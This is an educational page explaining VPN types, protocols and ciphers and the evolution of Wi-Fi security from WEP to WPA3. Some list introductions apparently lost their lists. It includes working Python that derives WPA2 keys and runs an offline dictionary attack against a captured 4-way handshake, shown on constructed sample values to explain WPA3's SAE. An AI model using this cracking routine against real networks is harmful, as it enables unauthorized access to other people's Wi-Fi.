```html
When using the internet or wireless networks, the security of your communication is extremely important. On public Wi-Fi or general internet connections, there is a risk that your communications could be intercepted by third parties. This page explains VPNs (Virtual Private Networks) and wireless security standards (WPA2/WPA3), which are technologies for securely protecting communications.
A VPN (Virtual Private Network) is a technology that lets you communicate as if you were on a private network even while using the public internet. The VPN client and server build an encrypted, authenticated tunnel and exchange all data inside it, so third parties on the path can neither read the content nor modify it without the tampering being detected.
Using a VPN provides the following benefits:
A remote access VPN is used by individual users to connect to a company's private network over the internet. It is often used for telecommuting or remote work to access internal company systems.
A Site-to-Site VPN is used to connect the networks of multiple geographically dispersed locations. For example, it can securely connect the networks of a headquarters and a branch office, allowing them to function as a single large network.
A client VPN (the commercial VPN service sold to consumers) is used by individual users to encrypt their internet connection and protect their privacy, typically on public Wi-Fi or to reach geo-restricted content. Note that this moves trust rather than removing it: the VPN provider, instead of the local network operator, is now the party that can see where your traffic goes.
VPN protocols define the method for establishing a VPN connection and the encryption method. The main VPN protocols include the following:
OpenVPN is an open-source VPN protocol that offers high security and flexibility. It uses TLS for its control channel (peer authentication and key negotiation) and then protects the data channel with a negotiated symmetric cipher such as AES-GCM or ChaCha20-Poly1305. It can run over either UDP or TCP on any port; run over TCP port 443 it looks like ordinary HTTPS from the outside, which is why it often passes firewalls that block other VPN protocols. It is adopted by many VPN services.
WireGuard is a relatively new VPN protocol characterized by a simple design and fast connections. Rather than negotiating algorithms, it fixes a small set of modern primitives (Curve25519 for key exchange, ChaCha20-Poly1305 for encryption, BLAKE2s for hashing), and its core implementation is a few thousand lines of code, which makes security audits far easier than for older protocols. It also keeps battery consumption low, making it suitable for mobile devices.
The combination of IKEv2 (Internet Key Exchange version 2) and IPsec (Internet Protocol Security) provides a stable and fast connection. Its MOBIKE extension lets an established tunnel survive a change of IP address, so it is particularly strong when switching between networks (e.g., from Wi-Fi to mobile data) and is well suited to mobile devices.
The combination of L2TP (Layer 2 Tunneling Protocol) and IPsec is a widely supported VPN protocol. L2TP only provides the tunnel and has no encryption of its own; IPsec (ESP) handles encryption and integrity protection. It is secure when configured with strong IPsec parameters, but because it relies on UDP ports 500 and 4500 together with ESP, it is blocked by some firewalls that only allow web traffic.
SSTP (Secure Socket Tunneling Protocol) is a protocol developed by Microsoft that carries the tunnel inside an SSL/TLS connection on TCP port 443, so its traffic looks like HTTPS. It has the advantage of passing through most firewalls easily, but it is mainly supported on the Windows platform.
The security of a VPN largely depends on the encryption algorithms used. Modern VPN services use the following encryption technologies:
AES is currently the most widely used symmetric encryption algorithm. VPNs typically use AES-128, AES-192, or AES-256; the number is the key length in bits. A longer key gives a larger margin against brute force at a modestly higher processing cost (AES-256 runs 14 rounds instead of the 10 of AES-128), and all three are considered secure today. In VPNs, AES is normally used in an authenticated mode such as AES-GCM so that tampering is detected as well as eavesdropping prevented.
ChaCha20 is a stream cipher that runs faster than AES in software, especially on devices without AES hardware acceleration (such as many mobile and embedded devices). It is normally paired with the Poly1305 authenticator as the ChaCha20-Poly1305 AEAD construction and is adopted by newer VPN protocols such as WireGuard.
RSA and Elliptic Curve Cryptography (ECC) are the public-key cryptosystems used for key exchange and authentication. ECC achieves a comparable level of security with a much shorter key: a 256-bit elliptic-curve key is generally rated equivalent to a 3072-bit RSA key, which makes handshakes faster and cheaper.
PFS (Perfect Forward Secrecy) means that a fresh, temporary key is generated for each session and discarded afterwards. Even if the long-term private key used for authentication is compromised later, previously recorded traffic cannot be decrypted, because that key never determined the session keys. Modern VPN protocols achieve PFS with an ephemeral Diffie-Hellman exchange (classic DH or, more commonly today, ECDH).
Many companies provide VPNs for remote workers to securely access the corporate network. This allows for secure access to internal systems and resources from outside the company.
Public Wi-Fi in places like cafes, hotels, and airports can pose a high security risk. By using a VPN, you can encrypt your communication content and protect your data from eavesdropping and man-in-the-middle attacks.
Some websites and streaming services have access restrictions based on region. By using a VPN to access them through a server in a different country or region, you may be able to bypass these restrictions.
Using a VPN can prevent your browsing history from being tracked by your Internet Service Provider (ISP) and ad networks, since websites see the VPN server's IP address rather than yours. Keep in mind that the VPN provider then sits where the ISP used to: it can see which destinations you connect to, so its logging policy matters as much as its encryption.
The security of Wi-Fi networks has evolved with the advancement of technology. The evolution of the main Wi-Fi security protocols is as follows:
WEP (Wired Equivalent Privacy) was an early Wi-Fi security protocol introduced in 1999. Serious weaknesses were found in its use of the RC4 cipher with short 24-bit initialization vectors, and it is now considered insecure: with freely available tools a WEP key can be recovered in a matter of minutes, so WEP should not be used.
WPA (Wi-Fi Protected Access) was introduced in 2003 as an interim fix for the vulnerabilities of WEP. It used TKIP (Temporal Key Integrity Protocol), which still built on RC4 so that it could run on existing WEP hardware; it was more secure than WEP, but weaknesses remained.
WPA2 was introduced in 2004, and its security was significantly improved by adopting AES encryption. It has been used as the standard Wi-Fi security protocol for many years.
WPA3 is the latest Wi-Fi security protocol, introduced in 2018. It addresses the vulnerabilities of WPA2 and provides stronger encryption and authentication mechanisms.
WPA2 was introduced in 2004 and became mandatory for all Wi-Fi certified devices manufactured after 2006. Its main features are as follows:
WPA2 uses AES with CCMP (Counter Mode with CBC-MAC Protocol), which provides both confidentiality and integrity for each frame. This is far stronger than the RC4-based encryption of WEP (plain RC4) and WPA (TKIP).
WPA2-Personal (Pre-Shared Key, PSK) is a mode for homes and small offices. All devices connect to the network using the same passphrase (Wi-Fi password). The passphrase and the SSID are fed through PBKDF2-HMAC-SHA1 (4096 iterations) to produce a 256-bit PMK (Pairwise Master Key); during the 4-way handshake each device then derives a per-session PTK (Pairwise Transient Key) from the PMK and the nonces exchanged, and the PTK is what actually encrypts its traffic. Because the PMK depends only on the passphrase and the SSID, anyone who records a handshake can test passphrase guesses offline, which is why a long random passphrase matters in this mode.
WPA2-Enterprise is a mode for businesses and large organizations. Clients authenticate through IEEE 802.1X with an EAP method against an authentication server, such as a RADIUS server, using per-user credentials (a username and password, or a client certificate) rather than one shared passphrase. Each client ends up with its own PMK, so one user's credentials do not expose other users' traffic, and access can be revoked per user. This simplifies user management and improves security.
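As an added example (not code from the original page, and not any vendor's implementation), the following Python reproduces the WPA2-Personal key derivation described above and then uses it the way an attacker would after recording a 4-way handshake. It also illustrates the offline dictionary attack that the SAE handshake in WPA3 is designed to prevent. The SSID, MAC addresses, nonces, the simplified EAPOL frame and the word list are constructed sample values; the PMK test vector for passphrase "password" on SSID "IEEE" comes from IEEE 802.11i Annex H.

```python
import hashlib
import hmac

# Added example (not from the original page): the WPA2-Personal key hierarchy
# (passphrase -> PMK -> PTK -> handshake MIC) and why a recorded 4-way
# handshake lets an attacker test passphrase guesses offline. The SSID, MAC
# addresses, nonces and EAPOL frame below are constructed sample values.


def wpa2_pmk(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, salt = SSID, 4096 iterations, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def ieee80211_prf(key: bytes, label: bytes, data: bytes, nbytes: int) -> bytes:
    """IEEE 802.11 PRF-n: concatenated HMAC-SHA1(key, label || 0x00 || data || i), i = 0, 1, ..."""
    out = b""
    i = 0
    while len(out) < nbytes:
        out += hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
        i += 1
    return out[:nbytes]


def wpa2_ptk(pmk: bytes, ap_mac: bytes, sta_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PTK for CCMP (48 bytes = KCK | KEK | TK), derived per session from the PMK,
    both MAC addresses and the two nonces exchanged in the 4-way handshake."""
    data = (min(ap_mac, sta_mac) + max(ap_mac, sta_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    return ieee80211_prf(pmk, b"Pairwise key expansion", data, 48)


def eapol_mic(kck: bytes, eapol_frame_mic_zeroed: bytes) -> bytes:
    """Key descriptor version 2 MIC: HMAC-SHA1 over the EAPOL-Key frame
    (with its MIC field zeroed), truncated to 16 bytes."""
    return hmac.new(kck, eapol_frame_mic_zeroed, hashlib.sha1).digest()[:16]


def crack_handshake(ssid, ap_mac, sta_mac, anonce, snonce, eapol_frame_mic_zeroed, mic, wordlist):
    """Offline dictionary attack against a captured handshake: each candidate costs
    one PBKDF2, one PRF and one HMAC, and never has to touch the access point."""
    for candidate in wordlist:
        ptk = wpa2_ptk(wpa2_pmk(candidate, ssid), ap_mac, sta_mac, anonce, snonce)
        kck = ptk[:16]
        if hmac.compare_digest(eapol_mic(kck, eapol_frame_mic_zeroed), mic):
            return candidate
    return None


# Constructed sample handshake parameters (not a real capture)
SSID = "HomeNet"
AP_MAC = bytes.fromhex("001122334455")
STA_MAC = bytes.fromhex("66778899aabb")
ANONCE = bytes(range(32))
SNONCE = bytes(range(32, 64))
# Simplified stand-in for EAPOL-Key message 2: header bytes, SNonce, zeroed 16-byte MIC field
EAPOL_MSG2 = bytes.fromhex("0103005f02010a00") + SNONCE + bytes(16)


def legitimate_mic(passphrase: str) -> bytes:
    """The MIC a station that really knows the passphrase would place in message 2."""
    ptk = wpa2_ptk(wpa2_pmk(passphrase, SSID), AP_MAC, STA_MAC, ANONCE, SNONCE)
    return eapol_mic(ptk[:16], EAPOL_MSG2)


if __name__ == "__main__":
    # IEEE 802.11i Annex H test vector: passphrase "password", SSID "IEEE"
    print("PMK:", wpa2_pmk("password", "IEEE").hex())
    captured = legitimate_mic("sunflower-77")
    print("recovered:", crack_handshake(SSID, AP_MAC, STA_MAC, ANONCE, SNONCE,
                                        EAPOL_MSG2, captured,
                                        ["password", "letmein", "sunflower-77"]))
```

The cost per guess is dominated by the 4096 PBKDF2 iterations, which is why a short or dictionary passphrase falls quickly to GPU-accelerated cracking while a long random one does not; under WPA3's SAE the same capture yields nothing to test guesses against.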
Several vulnerabilities have also been discovered in WPA2:
WPA3 is the latest Wi-Fi security protocol, introduced in 2018, and was developed to address the vulnerabilities of WPA2. Its main features are as follows:
WPA3 replaces the PSK handshake of WPA2 with SAE (Simultaneous Authentication of Equals, also known as the Dragonfly handshake). The network still uses a shared password, but the password is no longer used directly to derive the key; instead each side proves knowledge of it in an interactive exchange, so an attacker gets only one guess per live attempt and cannot test guesses offline against a captured handshake. SAE also provides Perfect Forward Secrecy (PFS), ensuring that past communications remain secure even if the password is disclosed in the future.
WPA3-Personal is a mode for homes and small offices that provides stronger protection using SAE. Even if a simple password is used, protection against offline dictionary attacks is enhanced.
WPA3-Enterprise is a mode for businesses and large organizations that optionally adds a 192-bit security mode aligned with the CNSA suite. It uses GCMP-256 (Galois/Counter Mode Protocol) for encryption, HMAC-SHA384 for key derivation, BIP-GMAC-256 for management frame protection, and ECDH and ECDSA (Elliptic Curve Digital Signature Algorithm) on a 384-bit curve, or 3072-bit RSA, for key establishment and authentication.
Alongside WPA3, the Wi-Fi Alliance introduced Wi-Fi Easy Connect, based on the Device Provisioning Protocol (DPP), as a secure replacement for WPS. By scanning a QR code or NFC tag that carries the device's public key, IoT devices without a display or keyboard can be enrolled in the network securely.
Enhanced Open is a feature that provides encryption even on open (password-less) Wi-Fi networks. It uses Opportunistic Wireless Encryption (OWE), an unauthenticated Diffie-Hellman exchange, so each client's traffic is encrypted with its own key even though nobody logs in, which removes passive eavesdropping on public Wi-Fi. It does not authenticate the access point, so it offers no protection against a rogue access point that imitates the real one.
The best practices for enhancing the security of your Wi-Fi network are as follows: